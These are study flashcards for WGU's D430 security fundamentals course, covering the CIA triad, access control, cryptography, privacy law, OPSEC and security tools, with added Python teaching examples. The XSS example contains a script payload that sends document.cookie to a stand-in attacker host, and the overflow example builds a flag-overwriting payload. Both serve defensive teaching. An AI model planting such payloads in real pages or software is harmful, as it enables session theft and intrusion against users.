WGU's D430 Flashcards
A tornado destroyed a data center. Which side of the CIA triad is most affected?
Authenticity
Availability
Utility
Integrity
Availability ensures authorized users have access to resources when needed.
What element of the Parkerian Hexad is concerned with usefulness?
Integrity
Confidentiality
Utility
Availability
Utility refers to how useful the data is.
Which attribute of the Parkerian hexad allows for proper attribution of the owner of a dataset?
Possession
Availability
Authenticity
Integrity
In the Parkerian hexad, authenticity means that data is genuine and can be correctly attributed to its owner or creator: an email really did come from the sender it names, a document really was produced by its stated author. Possession, by contrast, concerns physical or logical control of the data, and integrity concerns whether it has been altered.
Which type of attack category is an attack against confidentiality?
Interception.
Modification.
Fabrication.
Interruption.
Interception attacks allow unauthorized users to access data, applications, or environments.
Which two attributes are included in the concept of risk? Choose two answers.
Threats
Frequency
Vulnerabilities
Impacts
A threat is something that has the potential to cause harm.
Vulnerabilities are weaknesses that can be used to cause harm.
Which phase of the incident response (IR) process includes putting the system back better than the original state?
Post-incident activity.
Containment.
Recovery.
Detection and Analysis
The goal of the recovery phase is to recover to a better state than prior to the incident. This may include activities such as restoring devices or data from backups, rebuilding systems, reloading applications, and mitigating the attack vectors that were used.
Which concept refers to adding layers of security to our networks?
Administrative control depth.
Defense in depth.
Physical control depth.
Logical control depth.
Defense in depth is the coordinated use of multiple layers of security countermeasures to protect the integrity of the information assets.
Which combination of factors demonstrates multi-factor authentication?
Fingerprint and voice print
Password and Pin
Password and fingerprint
Voice print and weight
Password and fingerprint combines “something you know” with “something you are,” so it is multifactor. A password and a PIN are both “something you know,” and a fingerprint and a voice print are both “something you are,” so each of those pairs is two instances of a single factor, not two factors.
What is the name of the process where the client authenticates the server and the server authenticates the client?
Token-based authentication
Mutual authentication
Two-factor authentication
Multifactor authentication
Mutual authentication is an authentication mechanism where both parties authenticate each other at the same time.
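The exchange described above, as an added example that is not part of the original flashcards: a challenge-response handshake in which each side proves possession of a shared key to the other. The key, the nonce sizes and the role tags are assumptions chosen for the example; a production system would use certificates (as TLS does) or a provisioned per-pair secret.

```python
import hashlib
import hmac
import secrets

# Constructed shared secret for the example; a real deployment provisions one
# per client/server pair (or uses certificates, as TLS does).
SHARED_KEY = b"constructed-demo-key-do-not-reuse"


def proof(key: bytes, role: bytes, nonce: bytes) -> bytes:
    """HMAC-SHA256 over a role tag and the peer's nonce. The role tag stops a
    server's answer from being replayed back to it as a 'client' answer."""
    return hmac.new(key, role + nonce, hashlib.sha256).digest()


def mutual_authenticate(client_key: bytes, server_key: bytes) -> dict:
    """Run a two-way challenge-response handshake between a client holding
    client_key and a server holding server_key. Each side accepts the other
    only if the peer's proof matches what its own key predicts."""
    # 1. Client -> Server: a fresh random challenge.
    client_nonce = secrets.token_bytes(16)
    # 2. Server -> Client: proof over the client's challenge, plus its own challenge.
    server_nonce = secrets.token_bytes(16)
    server_proof = proof(server_key, b"server", client_nonce)
    # 3. Client checks the server's proof, then answers the server's challenge.
    client_verified_server = hmac.compare_digest(
        server_proof, proof(client_key, b"server", client_nonce))
    client_proof = proof(client_key, b"client", server_nonce)
    # 4. Server checks the client's proof.
    server_verified_client = hmac.compare_digest(
        client_proof, proof(server_key, b"client", server_nonce))
    return {"client_verified_server": client_verified_server,
            "server_verified_client": server_verified_client}


if __name__ == "__main__":
    print("genuine peers  :", mutual_authenticate(SHARED_KEY, SHARED_KEY))
    print("impostor server:", mutual_authenticate(SHARED_KEY, b"wrong-key"))
```

In a real handshake the client would abort at step 3 if the server's proof failed rather than continue; the example returns both verdicts so the asymmetric failure (an impostor server is rejected, and in turn cannot verify the genuine client) is visible. Using `hmac.compare_digest` rather than `==` avoids leaking the position of the first mismatching byte through timing.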
What is an example of identification?
Text to cell phone
Employee Number
Update Access
Fingerprint
Identification is the process of ascribing a user identifier (ID) to a human being or to another computer or network component.
What is an example of authentication?
Username
First Car
Read Only
Pin
Authentication refers to the verification of a user or process. A PIN can be used to verify a user or process after successful identification.
What is an objective for performing an audit?
To ensure a company can respond effectively to a disaster.
To ensure compliance and detect misuse.
To ensure potential risks are identified and analyzed.
To ensure proper access is granted to resources.
Audits are performed to ensure compliance with applicable laws, policies, and other administrative controls is being accomplished as well as detecting misuse.
What are two common values for a network access control list (ACL)? Choose two answers.
Accept
Agree
Disagree
Deny
Allow
Permissions in network ACLs tend to be binary in nature, consisting of deny or allow. Deny does not permit access to defined resources. Allow permits access to defined resources.
What are two common types of access control lists (ACLs)? Choose two answers.
File system
Allow
Network
Deny
Database system
Access to files and directories is managed through access control lists (ACLs). It ensures that only authorized users get access to directories and files.
Access to network resources is managed through access control lists (ACLs). It ensures that only authorized users get access to network resources.
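A network ACL evaluator, added here as an example and not part of the original flashcards, to show the allow/deny values above in practice and the two properties practitioners most often get wrong: rules are evaluated top-down with the first match deciding, and anything that matches nothing hits an implicit deny. The rule set and addresses are constructed for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    source: str              # source network in CIDR notation
    dst_port: Optional[int]  # None matches any destination port


# Constructed ACL for a server segment: internal hosts may reach anything
# except SSH, and the rest of the world may reach only HTTPS.
ACL: List[Rule] = [
    Rule("deny", "10.0.0.0/8", 22),
    Rule("allow", "10.0.0.0/8", None),
    Rule("allow", "0.0.0.0/0", 443),
]


def evaluate(acl: List[Rule], src_ip: str, dst_port: int) -> str:
    """Evaluate top-down; the first matching rule decides. A packet that
    matches no rule falls through to the implicit deny at the end."""
    ip = ip_address(src_ip)
    for rule in acl:
        in_network = ip in ip_network(rule.source)
        port_matches = rule.dst_port is None or rule.dst_port == dst_port
        if in_network and port_matches:
            return rule.action
    return "deny"


# The same rules with the first two swapped: the broad allow now shadows the
# SSH deny, so internal SSH is permitted even though the deny rule still exists.
MISORDERED_ACL: List[Rule] = [ACL[1], ACL[0], ACL[2]]


if __name__ == "__main__":
    for src, port in [("10.1.2.3", 22), ("10.1.2.3", 80),
                      ("203.0.113.5", 443), ("203.0.113.5", 80)]:
        print(f"{src}:{port} -> {evaluate(ACL, src, port)}"
              f" (misordered: {evaluate(MISORDERED_ACL, src, port)})")
```

The same first-match logic applies to file system ACLs in spirit, but their entries name users and groups rather than networks and ports, and most implementations evaluate explicit deny entries before allow entries regardless of order; check the semantics of the specific system before assuming either behaviour.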
Which access control model allows access to be determined by the owner of the resource?
Mandatory access control (MAC)
Attribute-based access control (ABAC)
Role-based access control (RBAC)
Discretionary access control (DAC)
Discretionary access control (DAC) is an access control model based on access being determined by the owner of the resource.
Which form of access control uses CAPTCHAs?
Attribute-based access control (ABAC)
Rule-based access control (RBAC)
Media access control (MAC)
Discretionary Access Control (DAC)
Attribute-based access control grants or denies access based on attributes of the subject, the resource, or the environment. A CAPTCHA tests one attribute of the subject, namely whether it is a human rather than an automated program.
What is the disadvantage of logging?
Highly configurable
Resources
Reactive tool
History of activities
Logging is the process of recording events, processes, and activities within a system, application, or other information technology environment.
It is a reactive tool: it records what happened after the fact rather than preventing it, so the records are only useful if someone (or something) reviews them.
Resources: logs consume storage and processing capacity, and their volume grows with the level of detail captured.
Which cryptographic algorithm is obsolete?
Hash functions
Asymmetric key cryptography
Caesar cipher
Symmetric key cryptography
The Caesar cipher is an early substitution cipher, named after Julius Caesar, that shifts each letter a fixed number of positions through the alphabet. With only 25 possible keys it is trivially broken by trying every shift, so it is obsolete for any real use.
Which two laws protect the privacy of medical records and electronic health care information? Choose two answers.
HIPAA
PCI-DSS
HITECH
SOX
GLBA
HIPAA: The Health Insurance Portability and Accountability Act of 1996 is a U.S. law designed to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other healthcare providers. It sets standards for the protection of health information privacy and the security of electronic health records.
HITECH: The Health Information Technology for Economic and Clinical Health Act, enacted as part of the American Recovery and Reinvestment Act of 2009, aims to promote the adoption and meaningful use of health information technology. It strengthens the data privacy and security protections established by HIPAA, especially for electronic health records, and introduces stricter enforcement measures.
What jurisdiction does the General Data Protection Regulation regulate?
China
Russia
The European Union
The United States
Developed by the EU for data privacy.
Which act regulates the United States department of education?
GLBA
FERPA
GDPR
FISMA
FERPA (the Family Educational Rights and Privacy Act) protects the privacy of student education records at institutions that receive funding from the U.S. Department of Education.
Which act regulates federal departments in the United States?
GLBA
SOX
GDPR
FISMA
FISMA (the Federal Information Security Management Act) mandates that U.S. federal agencies protect their information systems.
Which act regulates customer privacy in the finance industry?
GLBA
SOX
GDPR
FISMA
The GLBA requires financial institutions to explain information sharing practices.
Which act regulates reporting of publicly traded companies?
CFAA
SOX
GDPR
FOIA
SOX mandates certain practices for financial record keeping.
In the context of information security, the three states of data are:
Data at Rest: Data that is stored on physical or digital media, not actively moving from device to device or network to network. It’s often protected by encryption and access controls.
Data in Motion (or Data in Transit): Data actively moving through networks, such as the internet or private networks, from one location to another, such as from a local storage device to a cloud server. It is protected by transport encryption such as TLS (the successor to the now-deprecated SSL).
Data in Use: Data being processed or used by applications, often residing in computer memory (RAM). Protecting it involves measures like access controls and runtime encryption.
Which type of algorithm is a symmetric key?
DES
ECC
RSA
SHA
DES is a block cipher symmetric algorithm.
Incorrect:
ECC is an asymmetric algorithm.
RSA is an asymmetric algorithm.
SHA is a hashing algorithm.
Which type of algorithm is an asymmetric key?
ECC
MD5
SHA
DES
ECC (elliptic curve cryptography) is a form of public key cryptography based on the mathematics of elliptic curves over finite fields; it offers security comparable to RSA with much shorter keys.
Which two types of algorithms are hashing algorithms? Choose two answers.
MD5
3DES
SHA
ECC
AES
RC4
MD5 is an example of a hashing algorithm.
SHA is an example of a hashing algorithm.
Which algorithm supports encryption for email?
ECC
AES
PGP
DES
PGP (Pretty Good Privacy) is an encryption program, most commonly used to encrypt and digitally sign email. It combines symmetric encryption of the message body with asymmetric encryption of the message key.
What describes competitive intelligence?
The codename for a study conducted to curtail unauthorized passing of information.
The practice of managing the range of intelligence-gathering activities that are being directed at an organization.
The process that prevents sensitive information from getting into the wrong hands.
The process of intelligence gathering and analysis to support business decisions.
Competitive intelligence is the process of intelligence gathering and analysis to support business decisions.
The first law of operations security states:
“If you don’t know the threat, how do you know what to protect?”
Which law of operations security discusses the need to evaluate our information assets and determine what exactly we might consider to be our critical information?
The first law of operations security.
The second law of operations security.
The third law of operations security.
The fourth law of operations security.
The second law of operations security states, “If you don’t know what to protect, how do you know you are protecting it?”
The third law of operations security states:
“If you are not protecting it (the information)…THE DRAGON WINS!”
Which term refers to the practice of managing information gathering activities directed at an organization?
Purple Dragon
Competitive Counterintelligence
Operational Security
Competitive Intelligence
Correct: Competitive counterintelligence is the practice of managing the range of intelligence-gathering activities directed at an organization.
Incorrect: Operational Security is a security and risk management process that prevents sensitive information from getting into the wrong hands.
What describes risk assessment?
Identification of when there is a threat and a vulnerability that the threat can exploit.
Identification of what harm to the company can occur if important information is released.
Identifications of weaknesses that can harm a company.
Identification of information on which the company is based and everything depends.
Risk occurs when there is a matching threat and vulnerability. A risk assessment determines which risks require concern during the operations security process.
“what harm to the company can occur if important information is released” describes the potential impact assessment of a security breach.
Responsibility of the National Security Agency (NSA)
Present leaders with critical security information they need to defend our country.
Responsibility of the SysAdmin, Audit, Network, and Security (SANS) Institute
Provide access to information technology research and education around the world.
Responsibility of the Cybersecurity and Infrastructure Security Agency (CISA)
Lead the national effort to understand, manage, and reduce risk to our cyber and physical infrastructure.
What is the responsibility of the Interagency OpSec Support Staff (IOSS)?
Provide access to information technology research and education around the world.
Present leaders with critical security information they need to defend our country.
Lead the national effort to understand, manage, and reduce risk to our cyber and physical infrastructure.
Provide multiple agencies with a wide variety of security awareness and training.
The Interagency OPSEC Support Staff (IOSS) is responsible for a wide variety of OPSEC awareness and training efforts.
Which type of social engineering attack utilizes credible scenarios to lure people into disclosing sensitive information?
Pretexting
Whaling
Baiting
Tailgating
Pretexting is a type of social engineering attack that utilizes credible scenarios to lure people into disclosing sensitive information.
Which social engineering technique uses electronic communications to carry out an attack that is broad in nature?
Masquerading
Tailgating
Baiting
Phishing
Phishing is an attack against a company, organization, or person carried out by an electronic means, such as email or text messages, to carry out an attack that is broad in nature.
Shodan Disclosure
Shodan is a search engine that scans the internet for various types of devices connected to the internet, such as servers, webcams, printers, routers, and other devices that are part of the Internet of Things (IoT). Unlike traditional search engines that index web content, Shodan indexes information related to the devices themselves, including their types, locations, operating systems, and open ports. This information can be invaluable for security research and analysis, helping to identify potentially vulnerable devices and networks.
A “Shodan disclosure” typically refers to the act of revealing vulnerabilities, exposed devices, or sensitive information found through searches conducted on Shodan.
Which set of policies and procedures outlines the steps an organization will take during a state of emergency to replace IT infrastructure?
Data protection directive
Business continuity
Disaster recovery
Data security standard
Disaster recovery planning refers to policies and procedures that are put in place to prepare for and respond to a state of emergency in the event some or all of an organization’s IT infrastructure is destroyed.
Which type of security control is a video surveillance system?
Proactive
Detective
Preventive
Deterrent
Detective controls such as video surveillance systems and burglar alarms, serve to detect and report undesirable events.
DMZ
A Demilitarized Zone (DMZ) in network security is a strategically implemented subnetwork that serves as an additional layer of protection, combining the use of security mechanisms like firewalls with network architecture practices such as segmentation. Its primary function is to restrict, monitor, and control the flow of traffic between the internet and an organization’s internal network. By doing so, it creates a controlled interface for external access to publicly available services—such as web and email servers—while safeguarding the internal network from unauthorized access, attacks, and exposure.
Proxy servers
Proxy servers are a specialized variant of a firewall that provide security and performance features by filtering traffic for attacks or undesirable content.
Deep packet
Deep packet inspection firewalls analyze the content of traffic and can reassemble the content to determine what will be delivered to the destination application.
Which type of firewall monitors and defends a system based on traffic patterns over a given connection?
Proxy servers
Deep packet
DMZ
Stateful packet
Stateful packet inspection firewalls defend networks by monitoring traffic patterns at a granular level over a given connection.
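A small connection-tracking firewall, added here as an example and not part of the original flashcards, to show what “monitoring traffic patterns over a given connection” means in practice. It records TCP connections initiated from the inside and admits only their return traffic; an inbound packet with no matching state entry is dropped whatever port or flags it carries, which is exactly what a stateless port filter cannot do. The internal prefix, addresses and simplified state machine are assumptions for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

INTERNAL_PREFIX = "10.0.0."   # constructed: the protected network


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str   # "SYN", "SYN-ACK", "ACK", "FIN" or "RST" (simplified)


class StatefulFirewall:
    """Allows TCP connections initiated from the inside and lets only their
    return traffic back in. Anything inbound with no matching entry in the
    state table is dropped, whatever port or flags it carries."""

    def __init__(self) -> None:
        # key: (inside_ip, inside_port, outside_ip, outside_port) -> state
        self.table: Dict[Tuple[str, int, str, int], str] = {}

    @staticmethod
    def _internal(ip: str) -> bool:
        return ip.startswith(INTERNAL_PREFIX)

    def inspect(self, p: Packet) -> str:
        outbound = self._internal(p.src) and not self._internal(p.dst)
        inbound = self._internal(p.dst) and not self._internal(p.src)
        if outbound:
            key = (p.src, p.sport, p.dst, p.dport)
            if p.flags == "SYN" and key not in self.table:
                self.table[key] = "SYN_SENT"        # new connection from inside
                return "allow"
            if key in self.table:
                if p.flags in ("FIN", "RST"):
                    del self.table[key]             # connection torn down
                return "allow"
            return "drop"                            # stray outbound segment
        if inbound:
            key = (p.dst, p.dport, p.src, p.sport)
            state = self.table.get(key)
            if state is None:
                return "drop"                        # unsolicited: SYN scan, ACK scan, ...
            if state == "SYN_SENT" and p.flags == "SYN-ACK":
                self.table[key] = "ESTABLISHED"      # simplified three-way handshake
                return "allow"
            if state == "ESTABLISHED":
                if p.flags in ("FIN", "RST"):
                    del self.table[key]
                return "allow"
            return "drop"                            # wrong flags for this state
        return "drop"                                # neither side internal: not ours


def run(fw: StatefulFirewall, packets: List[Packet]) -> List[str]:
    """Feed packets through the firewall in order and return the verdicts."""
    return [fw.inspect(p) for p in packets]
```

The contrast with a stateless filter is the inbound ACK case: a rule of the form “allow inbound packets with ACK set” (the classic way to admit return traffic without state) would let an ACK scan through to every internal port, whereas the table above rejects it because no connection was ever opened.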
What is a wireless protocol?
RC4
WPA3
POP3
AES
WPA3 is a wireless security protocol; it uses AES-based encryption.
RC4
RC4 is a symmetric stream cipher. It was used by WEP and by WPA's TKIP mode and is now considered broken, which is one reason those protocols were replaced.
What is attack surface?
In information security, the “attack surface” refers to the sum total of all possible points (vulnerable spots or attack vectors) where an unauthorized user (the attacker) can try to enter or extract data from an environment. Essentially, it encompasses all the different ways an information system can be breached or compromised by an attacker.
What is “to perform system hardening”?
To perform system hardening means to take steps to reduce the attack surface of a system by securing its configurations, updating software to eliminate vulnerabilities, removing unnecessary services and applications, and enforcing the principle of least privilege. This process involves a comprehensive set of actions designed to protect against threats and minimize potential attack vectors.
When should updates be performed?
Semi-annually
After testing and vetting
After a system has been in production for many years
Immediately upon publication
It is prudent to test software updates thoroughly before installing them without delaying the process for very long.
Which port service needs to be removed when running a webserver?
80
22
53
443
A web server needs ports 80 and 443 for HTTP and HTTPS, and typically 22 for administrative SSH access. It has no reason to run a DNS server, so a service listening on port 53 is unnecessary and should be removed or disabled: every extra service enlarges the attack surface, and an exposed DNS server can divulge information about the network to attackers.
Which action is considered a significant event that should be included in the logging process?
A password change
A successful logon
An application closing
Administrative privilege
The use of administrative privileges is considered a significant event that should be closely monitored.
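Detection logic run over sample log lines, added here as an example (not part of the original flashcards) for both the logging card earlier on this page and the significant-events card above. It picks out uses of administrative privilege and password changes from syslog-style records and flags the one case that deserves immediate attention, an interactive root shell, because nothing the user does inside it will be logged per command. The log lines are constructed, modelled on what sshd, sudo and PAM write.

```python
import re
from typing import Dict, List

# Constructed syslog-style lines, modelled on what sshd, sudo and PAM write.
SAMPLE_LOG = """\
Mar 12 09:14:02 web01 sshd[2231]: Accepted publickey for alice from 10.0.0.5 port 51234 ssh2
Mar 12 09:14:40 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Mar 12 09:15:03 web01 passwd[2290]: pam_unix(passwd:chauthtok): password changed for bob
Mar 12 09:16:11 web01 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
Mar 12 09:16:12 web01 sshd[2301]: Failed password for invalid user admin from 198.51.100.7 port 40000 ssh2
Mar 12 09:20:00 web01 systemd[1]: Started Daily apt download activities.
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$")
PASSWD_RE = re.compile(r"password changed for (?P<user>\S+)")
SHELLS = ("/bash", "/sh", "/zsh", "/dash")


def significant_events(log_text: str) -> List[Dict]:
    """Surface the events worth alerting on: use of administrative privilege
    and password changes. Routine noise (service starts, ordinary logons)
    stays in the audit trail but is not surfaced."""
    events = []
    for line in log_text.splitlines():
        timestamp = line[:15]                      # "Mar 12 09:14:40"
        m = SUDO_RE.search(line)
        if m:
            command = m["cmd"].strip()
            events.append({
                "time": timestamp, "kind": "privilege_use", "user": m["user"],
                "target": m["target"], "command": command,
                # A root shell leaves no per-command record afterwards: flag it.
                "interactive_shell": command.split()[0].endswith(SHELLS),
            })
            continue
        m = PASSWD_RE.search(line)
        if m:
            events.append({"time": timestamp, "kind": "password_change", "user": m["user"]})
    return events


if __name__ == "__main__":
    for event in significant_events(SAMPLE_LOG):
        print(event)
```

This is the reactive nature of logging in action: the events have already happened by the time the parser sees them. The value comes from reviewing the output promptly (or feeding it to an alerting pipeline) and from keeping enough history, which is where the storage cost comes in.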
Which buffer size creates an entry point for a cyberattack when the buffer reaches 8 bytes?
16 bytes
12 bytes
8 bytes
4 bytes
A buffer overflow occurs when a program writes more data to a fixed-length block of memory, or buffer, than the buffer was allocated to hold. A buffer allocated at 4 bytes is exceeded once 8 bytes are written into it; the excess bytes spill into whatever is stored next to the buffer in memory, and that overwrite is the entry point for the attack.
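The 4-byte buffer and 8-byte write from the card above, modelled as an added example that is not part of the original flashcards. Real overflows happen in C-family code with no bounds checking; here a Python `bytearray` stands in for raw process memory (an assumption for the example), with a 4-byte input buffer laid out immediately before a 4-byte `is_admin` flag, as adjacent local variables or struct fields would be. The unbounded copy clobbers the flag; the bounded copy does not.

```python
# Constructed model of process memory: a 4-byte buffer immediately followed
# by a 4-byte integer flag. Offsets and sizes are assumptions for the example.
BUF_OFFSET, BUF_SIZE = 0, 4
FLAG_OFFSET, FLAG_SIZE = 4, 4
MEMORY_SIZE = BUF_SIZE + FLAG_SIZE


def fresh_memory() -> bytearray:
    """Buffer zeroed, is_admin flag set to 0 (not an administrator)."""
    return bytearray(MEMORY_SIZE)


def is_admin(mem: bytearray) -> bool:
    """Read the flag the way the program would: as a little-endian int."""
    return int.from_bytes(mem[FLAG_OFFSET:FLAG_OFFSET + FLAG_SIZE], "little") != 0


def unsafe_copy(mem: bytearray, data: bytes) -> int:
    """Models strcpy()/unbounded memcpy(): writes every byte supplied with no
    regard to the 4-byte allocation. Bytes 5..8 land on the flag; anything
    past the end of the model memory raises IndexError, the analogue of a
    crash when a real overflow runs off the mapped region."""
    for i, b in enumerate(data):
        mem[BUF_OFFSET + i] = b
    return len(data)


def safe_copy(mem: bytearray, data: bytes) -> int:
    """Bounded copy (strncpy/snprintf style): never writes more than BUF_SIZE
    bytes. Returns how many were stored so the caller can detect truncation."""
    n = min(len(data), BUF_SIZE)
    for i in range(n):
        mem[BUF_OFFSET + i] = data[i]
    return n


# Constructed attacker input: 4 bytes fill the buffer, the next 4 spell a
# little-endian 1 that lands exactly on is_admin.
PAYLOAD = b"AAAA" + (1).to_bytes(4, "little")


if __name__ == "__main__":
    m = fresh_memory()
    unsafe_copy(m, PAYLOAD)
    print("unsafe copy, is_admin:", is_admin(m))   # True: flag overwritten
    m = fresh_memory()
    safe_copy(m, PAYLOAD)
    print("safe copy,   is_admin:", is_admin(m))   # False: write stopped at 4 bytes
```

In native code the variable next to the buffer is often a saved return address rather than a flag, which is how an overflow turns into control of execution; the mechanism, writing past the allocation into the neighbour, is the same.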
Which tool is categorized as an exploit framework?
TCPdump
Nikto
OpenVas
Core Impact
Core Impact is a centralized penetration testing tool that enables security teams to conduct advanced, multi-phased penetration tests. It is a type of tool categorized as an exploit framework. Exploit frameworks include pre-packaged sets of exploits.
TCPdump
TCPdump is a data-network packet analyzer computer program that runs under a command line interface. It is not a type of tool categorized as an exploit framework.
Nikto
Nikto is an open-source Web server analysis tool that checks for common vulnerabilities. It is not a type of tool categorized as an exploit framework.
OpenVas
The OpenVAS scanner is a comprehensive vulnerability assessment system that can detect security issues in all manner of servers and network devices. It is not a type of tool categorized as an exploit framework.
Which symmetric encryption algorithm is the standard encryption algorithm used by the US Federal government?
DES
SHA-2
AES
RSA
AES is the standard encryption algorithm used by the US Federal government.
RSA
RSA is a widely used asymmetric encryption algorithm used for many transactions, including key exchange and authentication in SSL/TLS, the protocol that secures web and email traffic.
SHA-2
SHA-2 is a family of hash functions commonly used to validate and sign digital certificates and documents.
XSS
Cross-site scripting (XSS) is a security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into content that other users see and interact with.
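An added example, not part of the original flashcards, showing the vulnerable rendering beside the hardened one: server-side code that builds HTML from an attacker-controlled display name. The payloads and the page fragment are constructed for the example. The second half shows a caveat practitioners hit often: encoding is context-dependent, and escaping alone does not protect an unquoted attribute value.

```python
import html
from html.parser import HTMLParser
from typing import List

# Constructed attacker-supplied "display name", e.g. submitted via a profile form.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_unsafe(name: str) -> str:
    """Vulnerable: input is concatenated straight into the HTML, so a name
    containing markup becomes markup in every visitor's browser."""
    return "<p>Welcome, " + name + "</p>"


def render_safe(name: str) -> str:
    """Hardened: input is encoded for an HTML text context, so the browser
    renders the angle brackets as characters instead of tags."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


# Attribute context. Escaping is not enough if the attribute is unquoted:
# a space ends the value and everything after it becomes new attributes.
ATTR_PAYLOAD = "x onfocus=alert(1) autofocus"


def render_attr_unquoted(name: str) -> str:
    """Still vulnerable despite escaping, because the value is unquoted."""
    return "<input value=" + html.escape(name, quote=True) + ">"


def render_attr_quoted(name: str) -> str:
    """Hardened: quoted attribute plus escaping of the quote character."""
    return '<input value="' + html.escape(name, quote=True) + '">'


class _AttrCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.attrs: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(name for name, _ in attrs)


def attribute_names(fragment: str) -> List[str]:
    """What an HTML parser (standing in for the browser) sees as attributes."""
    p = _AttrCollector()
    p.feed(fragment)
    return p.attrs


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(attribute_names(render_attr_unquoted(ATTR_PAYLOAD)))  # ['value', 'onfocus', 'autofocus']
    print(attribute_names(render_attr_quoted(ATTR_PAYLOAD)))    # ['value']
```

The general rule is to encode output for the exact context it lands in (HTML body, quoted attribute, JavaScript string, URL) rather than trying to filter input, and to let a templating engine with auto-escaping do it by default.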
What describes a database security issue?
Denial of Service
Unauthenticated access to functionality
Buffer overflows
Cross-site scripting
Allowing a user or process the opportunity to interact with the database without supplying a set of credentials creates potential database issues.
Which type of packet sniffer is used to monitor web traffic?
Fuzzer
Honeypot
Wireshark
Nessus
Wireshark is a sniffer that is capable of intercepting and troubleshooting traffic from both wired and wireless sources.
Nessus
Nessus will identify open ports and determine the services and versions of service running on those ports.
Also used to find and report network services on hosts that have known vulnerabilities.
Fuzzer
A fuzzer is a software testing tool used to find security vulnerabilities or bugs in software. It works by automatically generating and sending a wide range of invalid, unexpected, or random data as inputs to a computer program.
Which tool is used to perform web assessment and analysis?
Nessus
Burp Suite
Kismet
Hping3
Burp Suite is a web assessment and analysis tool that looks for issues on websites such as cross-site scripting or SQL injection flaws.
Burp Suite
A popular integrated platform used for testing the security of web applications. It offers a variety of tools for performing different security tests, including scanning for vulnerabilities, intercepting and modifying network traffic, and identifying weak points within an application.
Kismet
Kismet is a tool commonly used to detect wireless access points.
What are SSL and TLS, and how do they function in securing information transmitted over networks and the internet, particularly in relation to email protocols like IMAP and POP?
SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols designed to secure information sent over networks, including the internet. They provide encryption, authentication, and integrity for data in transit, ensuring that data sent between a client and a server is protected from eavesdropping and tampering. SSL and TLS are layered beneath other protocols, such as the Internet Message Access Protocol (IMAP) and the Post Office Protocol (POP), which are used to retrieve email; wrapping those protocols in TLS protects the mailbox credentials and message contents as they travel across the network. SSL itself is deprecated and all versions are considered insecure; current deployments use TLS, although the older name persists in everyday usage.